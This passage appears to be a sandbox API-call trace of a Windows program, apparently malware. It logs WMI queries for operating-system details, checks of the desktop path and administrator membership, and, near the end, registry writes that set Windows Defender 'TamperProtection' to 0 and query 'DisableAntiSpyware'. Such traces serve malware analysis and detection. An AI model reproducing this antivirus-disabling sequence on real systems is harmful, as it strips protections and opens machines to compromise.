| out: ppvObject=0x39dd60*=0x880d4d8) returned 0x0 [0042.178] IUnknown:QueryInterface (in: This=0x880d4d8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x39dd1c | out: ppvObject=0x39dd1c*=0x0) returned 0x80004002 [0042.179] IUnknown:QueryInterface (in: This=0x880d4d8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x39db3c | out: ppvObject=0x39db3c*=0x0) returned 0x80004002 [0042.179] IUnknown:AddRef (This=0x880d4d8) returned 0x3 [0042.180] IUnknown:QueryInterface (in: This=0x880d4d8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x39d67c | out: ppvObject=0x39d67c*=0x0) returned 0x80004002 [0042.180] IUnknown:QueryInterface (in: This=0x880d4d8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x39d62c | out: ppvObject=0x39d62c*=0x0) returned 0x80004002 [0042.180] IUnknown:QueryInterface (in: This=0x880d4d8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39d638 | out: ppvObject=0x39d638*=0x880d4dc) returned 0x0 [0042.180] IMarshal:GetUnmarshalClass (in: This=0x880d4dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x39d640 | out: pCid=0x39d640*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0042.180] IUnknown:Release (This=0x880d4dc) returned 0x3 [0042.180] CoGetContextToken (in: pToken=0x39d698 | out: pToken=0x39d698) returned 0x0 [0042.180] CoGetContextToken (in: pToken=0x39daa0 | out: pToken=0x39daa0) returned 0x0 [0042.180] IUnknown:QueryInterface (in: This=0x880d4d8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39db30 | out: ppvObject=0x39db30*=0x0) returned 0x80004002 [0042.180] IUnknown:Release (This=0x880d4d8) returned 0x2 [0042.180] CoGetContextToken (in: pToken=0x39e070 | out: pToken=0x39e070) returned 0x0 [0042.180] CoGetContextToken (in: pToken=0x39dfd0 | out: pToken=0x39dfd0) returned 0x0 [0042.180] IUnknown:QueryInterface (in: This=0x880d4d8, riid=0x39e0a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x39e09c | out: ppvObject=0x39e09c*=0x880d4d8) returned 0x0 [0042.180] IUnknown:AddRef (This=0x880d4d8) returned 0x4 [0042.180] IUnknown:Release (This=0x880d4d8) returned 0x3 [0042.180] IUnknown:Release (This=0x880d4d8) returned 0x2 [0042.180] CoTaskMemFree (pv=0x7c0fa8) [0042.180] CoGetContextToken (in: pToken=0x39e3e0 | out: pToken=0x39e3e0) returned 0x0 [0042.180] IUnknown:AddRef (This=0x880d4d8) returned 0x3 [0042.180] CoTaskMemAlloc (cb=0x4) returned 0x7c0fa8 [0042.180] IEnumWbemClassObject:Next (in: This=0x880d49c, lTimeout=-1, uCount=0x1, apObjects=0x7c0fa8, puReturned=0x22e2c74 | out: apObjects=0x7c0fa8*=0x0, puReturned=0x22e2c74*=0x0) returned 0x1 [0042.181] CoTaskMemFree (pv=0x7c0fa8) [0042.181] CoGetContextToken (in: pToken=0x39e550 | out: pToken=0x39e550) returned 0x0 [0042.181] IUnknown:AddRef (This=0x880d3d4) returned 0x3 [0042.181] IEnumWbemClassObject:Clone (in: This=0x880d3d4, ppEnum=0x39e710 | out: ppEnum=0x39e710*=0x88101dc) returned 0x0 [0042.182] IUnknown:QueryInterface (in: This=0x88101dc, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5d4 | out: ppvObject=0x39e5d4*=0x88101e0) returned 0x0 [0042.182] IClientSecurity:QueryBlanket (in: This=0x88101e0, pProxy=0x88101dc, pAuthnSvc=0x39e624, pAuthzSvc=0x39e620, pServerPrincName=0x39e618, pAuthnLevel=0x39e61c, pImpLevel=0x39e60c, pAuthInfo=0x39e610, pCapabilites=0x39e614 | out: pAuthnSvc=0x39e624*=0xa, pAuthzSvc=0x39e620*=0x0, pServerPrincName=0x39e618, pAuthnLevel=0x39e61c*=0x6, pImpLevel=0x39e60c*=0x2, pAuthInfo=0x39e610, pCapabilites=0x39e614*=0x1) returned 0x0 [0042.182] IUnknown:Release (This=0x88101e0) returned 0x1 [0042.182] IUnknown:QueryInterface (in: This=0x88101dc, riid=0x741f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5c8 | out: ppvObject=0x39e5c8*=0x7f355c) returned 0x0 [0042.182] IUnknown:QueryInterface (in: This=0x88101dc, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5c4 | out: ppvObject=0x39e5c4*=0x88101e0) returned 0x0 [0042.182] IClientSecurity:SetBlanket (This=0x88101e0, pProxy=0x88101dc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0042.184] IUnknown:Release (This=0x88101e0) returned 0x2 [0042.184] WbemLocator:IUnknown:Release (This=0x7f355c) returned 0x1 [0042.184] CoTaskMemFree (pv=0x7eb950) [0042.184] IUnknown:QueryInterface (in: This=0x88101dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e1b0 | out: ppvObject=0x39e1b0*=0x7f355c) returned 0x0 [0042.184] WbemLocator:IUnknown:QueryInterface (in: This=0x7f355c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x39e16c | out: ppvObject=0x39e16c*=0x0) returned 0x80004002 [0042.184] WbemLocator:IUnknown:QueryInterface (in: This=0x7f355c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x39df8c | out: ppvObject=0x39df8c*=0x0) returned 0x80004002 [0042.185] WbemLocator:IUnknown:AddRef (This=0x7f355c) returned 0x3 [0042.185] WbemLocator:IUnknown:QueryInterface (in: This=0x7f355c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x39dacc | out: ppvObject=0x39dacc*=0x0) returned 0x80004002 [0042.185] WbemLocator:IUnknown:QueryInterface (in: This=0x7f355c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x39da7c | out: ppvObject=0x39da7c*=0x0) returned 0x80004002 [0042.186] WbemLocator:IUnknown:QueryInterface (in: This=0x7f355c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39da88 | out: ppvObject=0x39da88*=0x7f34bc) returned 0x0 [0042.186] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f34bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x39da90 | out: pCid=0x39da90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0042.186] WbemLocator:IUnknown:Release (This=0x7f34bc) returned 0x3 [0042.186] CoGetContextToken (in: pToken=0x39dae8 | out: pToken=0x39dae8) returned 0x0 [0042.186] CoGetContextToken (in: pToken=0x39def0 | out: pToken=0x39def0) returned 0x0 [0042.186] WbemLocator:IUnknown:QueryInterface (in: This=0x7f355c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39df80 | out: ppvObject=0x39df80*=0x7f3544) returned 0x0 [0042.186] WbemLocator:IRpcOptions:Query (in: This=0x7f3544, pPrx=0x7f355c, dwProperty=2, pdwValue=0x39dfa8 | out: pdwValue=0x39dfa8) returned 0x80004002 [0042.186] WbemLocator:IUnknown:Release (This=0x7f3544) returned 0x3 [0042.186] WbemLocator:IUnknown:Release (This=0x7f355c) returned 0x2 [0042.186] CoGetContextToken (in: pToken=0x39e4c0 | out: pToken=0x39e4c0) returned 0x0 [0042.186] CoGetContextToken (in: pToken=0x39e420 | out: pToken=0x39e420) returned 0x0 [0042.186] WbemLocator:IUnknown:QueryInterface (in: This=0x7f355c, riid=0x39e4f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x39e4ec | out: ppvObject=0x39e4ec*=0x88101dc) returned 0x0 [0042.186] IUnknown:AddRef (This=0x88101dc) returned 0x4 [0042.186] IUnknown:Release (This=0x88101dc) returned 0x3 [0042.186] IUnknown:Release (This=0x88101dc) returned 0x2 [0042.186] IUnknown:Release (This=0x880d3d4) returned 0x2 [0042.186] SysStringLen (param_1=0x0) returned 0x0 [0042.186] IEnumWbemClassObject:Reset (This=0x88101dc) returned 0x0 [0042.187] CoTaskMemAlloc (cb=0x4) returned 0x7c0fd8 [0042.187] IEnumWbemClassObject:Next (in: This=0x88101dc, lTimeout=-1, uCount=0x1, apObjects=0x7c0fd8, puReturned=0x22e2d58 | out: apObjects=0x7c0fd8*=0x8810218, puReturned=0x22e2d58*=0x1) returned 0x0 [0042.189] IUnknown:QueryInterface (in: This=0x8810218, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39dd70 | out: ppvObject=0x39dd70*=0x8810218) returned 0x0 [0042.189] IUnknown:QueryInterface (in: This=0x8810218, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x39dd2c | out: ppvObject=0x39dd2c*=0x0) returned 0x80004002 [0042.189] IUnknown:QueryInterface (in: This=0x8810218, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x39db4c | out: ppvObject=0x39db4c*=0x0) returned 0x80004002 [0042.189] IUnknown:AddRef (This=0x8810218) returned 0x3 [0042.189] IUnknown:QueryInterface (in: This=0x8810218, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x39d68c | out: ppvObject=0x39d68c*=0x0) returned 0x80004002 [0042.189] IUnknown:QueryInterface (in: This=0x8810218, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x39d63c | out: ppvObject=0x39d63c*=0x0) returned 0x80004002 [0042.189] IUnknown:QueryInterface (in: This=0x8810218, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39d648 | out: ppvObject=0x39d648*=0x881021c) returned 0x0 [0042.189] IMarshal:GetUnmarshalClass (in: This=0x881021c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x39d650 | out: pCid=0x39d650*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0042.189] IUnknown:Release (This=0x881021c) returned 0x3 [0042.189] CoGetContextToken (in: pToken=0x39d6a8 | out: pToken=0x39d6a8) returned 0x0 [0042.189] CoGetContextToken (in: pToken=0x39dab0 | out: pToken=0x39dab0) returned 0x0 [0042.189] IUnknown:QueryInterface (in: This=0x8810218, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39db40 | out: ppvObject=0x39db40*=0x0) returned 0x80004002 [0042.189] IUnknown:Release (This=0x8810218) returned 0x2 [0042.189] CoGetContextToken (in: pToken=0x39e080 | out: pToken=0x39e080) returned 0x0 [0042.189] CoGetContextToken (in: pToken=0x39dfe0 | out: pToken=0x39dfe0) returned 0x0 [0042.189] IUnknown:QueryInterface (in: This=0x8810218, riid=0x39e0b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x39e0ac | out: ppvObject=0x39e0ac*=0x8810218) returned 0x0 [0042.189] IUnknown:AddRef (This=0x8810218) returned 0x4 [0042.189] IUnknown:Release (This=0x8810218) returned 0x3 [0042.189] IUnknown:Release (This=0x8810218) returned 0x2 [0042.189] CoTaskMemFree (pv=0x7c0fd8) [0042.189] CoGetContextToken (in: pToken=0x39e3f0 | out: pToken=0x39e3f0) returned 0x0 [0042.190] IUnknown:AddRef (This=0x8810218) returned 0x3 [0042.191] IWbemClassObject:Get (in: This=0x8810218, wszName="__GENUS", lFlags=0, pVal=0x39e700*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x39e780*=0, plFlavor=0x39e77c*=0 | out: pVal=0x39e700*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x39e780*=3, plFlavor=0x39e77c*=64) returned 0x0 [0042.191] IWbemClassObject:Get (in: This=0x8810218, wszName="__PATH", lFlags=0, pVal=0x39e6e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x39e768*=0, plFlavor=0x39e764*=0 | out: pVal=0x39e6e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x39e768*=8, plFlavor=0x39e764*=64) returned 0x0 [0042.191] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x7e [0042.191] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x7e [0042.192] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x320 [0042.192] SetEvent (hEvent=0x254) returned 1 [0042.192] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x39e6bc*=0x320, lpdwindex=0x39e4dc | out: lpdwindex=0x39e4dc) returned 0x0 [0042.195] CoGetContextToken (in: pToken=0x39e588 | out: pToken=0x39e588) returned 0x0 [0042.195] CoGetContextToken (in: pToken=0x39e4e8 | out: pToken=0x39e4e8) returned 0x0 [0042.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x880ca30, riid=0x39e5b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x39e5b4 | out: ppvObject=0x39e5b4*=0x880ca30) returned 0x0 [0042.195] WbemDefPath:IUnknown:AddRef (This=0x880ca30) returned 0x3 [0042.195] WbemDefPath:IUnknown:Release (This=0x880ca30) returned 0x2 [0042.195] WbemDefPath:IWbemPath:SetText (This=0x880ca30, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x0 [0042.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x8800998, puCount=0x39e73c | out: puCount=0x39e73c*=0x2) returned 0x0 [0042.195] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=4, puBuffLength=0x39e738*=0x0, pszText=0x0 | out: puBuffLength=0x39e738*=0xf, pszText=0x0) returned 0x0 [0042.195] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=4, puBuffLength=0x39e738*=0xf, pszText="00000000000000" | out: puBuffLength=0x39e738*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0042.203] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x8800998, puCount=0x39e730 | out: puCount=0x39e730*=0x2) returned 0x0 [0042.203] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=4, puBuffLength=0x39e72c*=0x0, pszText=0x0 | out: puBuffLength=0x39e72c*=0xf, pszText=0x0) returned 0x0 [0042.203] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=4, puBuffLength=0x39e72c*=0xf, pszText="00000000000000" | out: puBuffLength=0x39e72c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0042.203] IWbemClassObject:Get (in: This=0x8810218, wszName="Name", lFlags=0, pVal=0x39e72c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22e3640*=0, plFlavor=0x22e3644*=0 | out: pVal=0x39e72c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x22e3640*=8, plFlavor=0x22e3644*=32) returned 0x0 [0042.203] SysStringByteLen (bstr="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x92 [0042.203] SysStringByteLen (bstr="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x92 [0042.204] IWbemClassObject:Get (in: This=0x8810218, wszName="Name", lFlags=0, pVal=0x39e734*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22e3640*=8, plFlavor=0x22e3644*=32 | out: pVal=0x39e734*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x22e3640*=8, plFlavor=0x22e3644*=32) returned 0x0 [0042.204] SysStringByteLen (bstr="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x92 [0042.204] SysStringByteLen (bstr="Microsoft Windows 7 Professional |C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x92 [0043.946] CoTaskMemAlloc (cb=0x20c) returned 0x7e6d68 [0043.947] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x7e6d68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0043.952] CoTaskMemFree (pv=0x7e6d68) [0043.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x39e258, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0043.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bytes.file", nBufferLength=0x105, lpBuffer=0x39e2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bytes.file", lpFilePart=0x0) returned 0x30 [0043.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x39e750) returned 1 [0043.953] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bytes.file" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bytes.file"), fInfoLevelId=0x0, lpFileInformation=0x39e7cc | out: lpFileInformation=0x39e7cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x39e74c) returned 1 [0043.962] GetCurrentProcess () returned 0xffffffff [0043.962] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x39e784 | out: TokenHandle=0x39e784*=0x348) returned 1 [0043.969] GetTokenInformation (in: TokenHandle=0x348, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x39e784 | out: TokenInformation=0x0, ReturnLength=0x39e784) returned 0 [0043.969] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7f6e20 [0043.969] GetTokenInformation (in: TokenHandle=0x348, TokenInformationClass=0x8, TokenInformation=0x7f6e20, TokenInformationLength=0x4, ReturnLength=0x39e784 | out: TokenInformation=0x7f6e20, ReturnLength=0x39e784) returned 1 [0043.971] LocalFree (hMem=0x7f6e20) returned 0x0 [0043.972] DuplicateTokenEx (in: hExistingToken=0x348, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x39e78c | out: phNewToken=0x39e78c*=0x344) returned 1 [0043.972] CheckTokenMembership (in: TokenHandle=0x344, SidToCheck=0x22e4f68*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x39e79c | out: IsMember=0x39e79c) returned 1 [0043.972] CloseHandle (hObject=0x344) returned 1 [0043.979] GetCurrentProcess () returned 0xffffffff [0043.979] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x39e784 | out: TokenHandle=0x39e784*=0x344) returned 1 [0043.979] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x39e784 | out: TokenInformation=0x0, ReturnLength=0x39e784) returned 0 [0043.979] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7f6e20 [0043.979] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x7f6e20, TokenInformationLength=0x4, ReturnLength=0x39e784 | out: TokenInformation=0x7f6e20, ReturnLength=0x39e784) returned 1 [0043.979] LocalFree (hMem=0x7f6e20) returned 0x0 [0043.979] DuplicateTokenEx (in: hExistingToken=0x344, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x39e78c | out: phNewToken=0x39e78c*=0x34c) returned 1 [0043.979] CheckTokenMembership (in: TokenHandle=0x34c, SidToCheck=0x22e546c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x39e79c | out: IsMember=0x39e79c) returned 1 [0043.979] CloseHandle (hObject=0x34c) returned 1 [0043.990] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender\\Features", ulOptions=0x0, samDesired=0x2001f, phkResult=0x39e764 | out: phkResult=0x39e764*=0x0) returned 0x2 [0043.990] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender\\Features", ulOptions=0x0, samDesired=0x2001f, phkResult=0x39e728 | out: phkResult=0x39e728*=0x0) returned 0x2 [0043.991] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender\\Features", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x39e724, lpdwDisposition=0x39e7ac | out: phkResult=0x39e724*=0x34c, lpdwDisposition=0x39e7ac*=0x1) returned 0x0 [0043.992] RegQueryValueExW (in: hKey=0x34c, lpValueName="TamperProtection", lpReserved=0x0, lpType=0x39e780, lpData=0x0, lpcbData=0x39e77c*=0x0 | out: lpType=0x39e780*=0x0, lpData=0x0, lpcbData=0x39e77c*=0x0) returned 0x2 [0043.994] RegSetValueExW (in: hKey=0x34c, lpValueName="TamperProtection", Reserved=0x0, dwType=0x4, lpData=0x39e79c*=0x0, cbData=0x4 | out: lpData=0x39e79c*=0x0) returned 0x0 [0043.994] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2001f, phkResult=0x39e764 | out: phkResult=0x39e764*=0x0) returned 0x2 [0043.995] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2001f, phkResult=0x39e728 | out: phkResult=0x39e728*=0x0) returned 0x2 [0043.995] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x39e724, lpdwDisposition=0x39e7ac | out: phkResult=0x39e724*=0x350, lpdwDisposition=0x39e7ac*=0x1) returned 0x0 [0043.996] RegQueryValueExW (in: hKey=0x350, lpValueName="DisableAntiSpyware", lpReserved=0x0, lpType=0x39e780, lpData=0x0, lpcbData=0x39e77c*=0x0 | out: lpType=0x39e780*=0x0, lpData=0x0, 